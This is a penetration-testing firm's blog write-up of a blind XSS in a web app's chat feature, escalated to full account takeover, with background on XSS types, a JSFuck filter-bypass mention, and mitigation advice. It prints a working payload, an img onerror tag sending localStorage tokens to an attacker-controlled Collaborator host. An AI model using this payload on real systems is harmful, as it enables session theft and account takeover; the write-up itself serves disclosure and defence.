Blind XSS to Complete Account Takeover
Written by Yuval Batan on
Blind XSS to Complete Account Takeover
Written by Yuval Batan on
Introduction
Applications’ security remains a constant challenge. Particular vulnerabilities pose significant risks when left unaddressed. One such threat is Cross-Site Scripting (XSS), a flaw that allows attackers to inject and execute malicious scripts in a victim’s browser. While some XSS attacks result in minor annoyances, others can have severe consequences, including complete account takeover. In a recent security test, we identified a critical blind XSS vulnerability. This flaw allowed an attacker to execute malicious JavaScript code on an internal user’s side and steal its access token. This token permitted a complete victim impersonation, gaining unauthorized access to sensitive customers’ data and system functionalities.
This case highlights the real-world impact of XSS beyond simple script execution. It demonstrates how a single injection point, when exploited strategically, can escalate into a complete compromise of user accounts and sensitive business operations. The following article will analyze this vulnerability, demonstrate its impact, and discuss best practices to prevent such attacks.
What is Cross-Site Scripting?
Cross-site scripting (XSS) is a web security vulnerability that allows attackers to inject and execute malicious scripts in a victim’s browser. This typically occurs when developers fail to sanitize or validate user input before reflecting it on a web page. Attackers can exploit XSS to steal sensitive data, hijack user sessions, deface websites, or perform actions as the victim.
XSS vulnerabilities arise due to insufficient input sanitization and improper output encoding, allowing attackers to manipulate web applications into executing unauthorized scripts. This flaw can exist in various parts of a web application, including search fields, comment sections, and chats.
There are three main types of XSS:
- Stored XSS – Attackers permanently inject malicious scripts into the application’s database. The script executes every time a user loads the affected page. A variant of this is Blind XSS, where the injected payload executes later in a different part of the application, such as an admin panel, without immediate feedback to the attacker. Detecting blind XSS often requires monitoring for delayed execution.
- Reflected XSS – Attackers include the script in a URL or request, and the browser executes it when the victim clicks the malicious link.
- DOM-based XSS – The attack occurs when the client-side JavaScript of the page modifies the DOM and reflects user input without proper sanitization, allowing an attacker to execute malicious scripts.
Real Life Scenario
The following showcase will demonstrate the impact of a blind XSS vulnerability in a real-world scenario. In this case, researchers identified the vulnerability in a web application’s chat feature, which facilitates communication with internal users in the organization.We exploited the vulnerability to steal an access token, perform a complete account takeover, and compromise sensitive users’ and system data.
For demonstration purposes, we used the PortSwigger Burp Suite tool, a software for application security testing that allows inspection and modification of the traffic between the client and server sides. Also, we utilized Burp’s Collaborator feature, which allows receiving HTTP requests on our Collaborator server. This setup enabled us to observe the execution of the malicious script, even though the attack was blind at the moment of injection.
The system allows unauthenticated users to access a chat feature that connects them directly with the organization’s users. Sending a new message through this chat will trigger a new HTTP request towards the “chats” API endpoint.
POST /{censored}/{censored}/v1/chats
Because of server-side validations and the blind XSS vulnerability, attackers must bypass filters and sanitization. They can achieve this using the “JSFck” technique. This technique is an obfuscation that encodes JavaScript code using only six characters ([, ], (, ), !, and +). This allows the injection of malicious scripts without triggering validation filters, as the encoded payload appears as non-malicious input. This obfuscated payload executes the script on the targeted user’s browser as soon as they open the message.
The attacker uses the payload to exploit the blind XSS vulnerability and steal the victim’s access token from local storage. The payload was as follows:
<img/src/onerror=document.location=’https://{collaborator}.oastify.com?t=’+localStorage>
The payload uses the onerror attribute of a <img> tag to trigger the script when the image source is invalid. It retrieves the localStorage data, which is not protected, includes the user’s access token, and sends it to a remote server controlled by the attacker. Then, it can be used to perform a complete account takeover.
What’s Next?
When the internal user opens the chat, the injected JavaScript code will be triggered, which will automatically send the user’s access token to the attacker’s remote server and result in a complete account takeover as follows:
Mitigation
If you have encountered any of the above scenarios, please follow the below instructions for immediate mitigation and to prevent XSS attacks further:
- Input Sanitization: Use libraries like DOMPurify to automatically sanitize user input before rendering it. This helps remove or neutralize malicious scripts while preserving safe content.
- Output Encoding: Encode special characters received from the client before rendering them to prevent script execution. Convert characters like <, >, and & into their HTML entities to ensure they are displayed as text rather than executed as code.
Conclusion
In conclusion, this blind XSS vulnerability demonstrates how unsanitized user input can lead to a complete account takeover by stealing access tokens from local storage. Without proper sanitization, malicious scripts can be injected and executed unknowingly, allowing attackers to hijack user sessions, steal sensitive data, and potentially escalate access within the system. This attack compromises sensitive data and poses a serious security risk to users and organizations.
Organizations should prioritize cyber security risk assessments and penetration tests to mitigate risks in input validation deployments. Clear Gate, a trusted cybersecurity provider, offers in-depth manual penetration tests to help organizations strengthen their web applications’ security and protect valuable data from potential threats.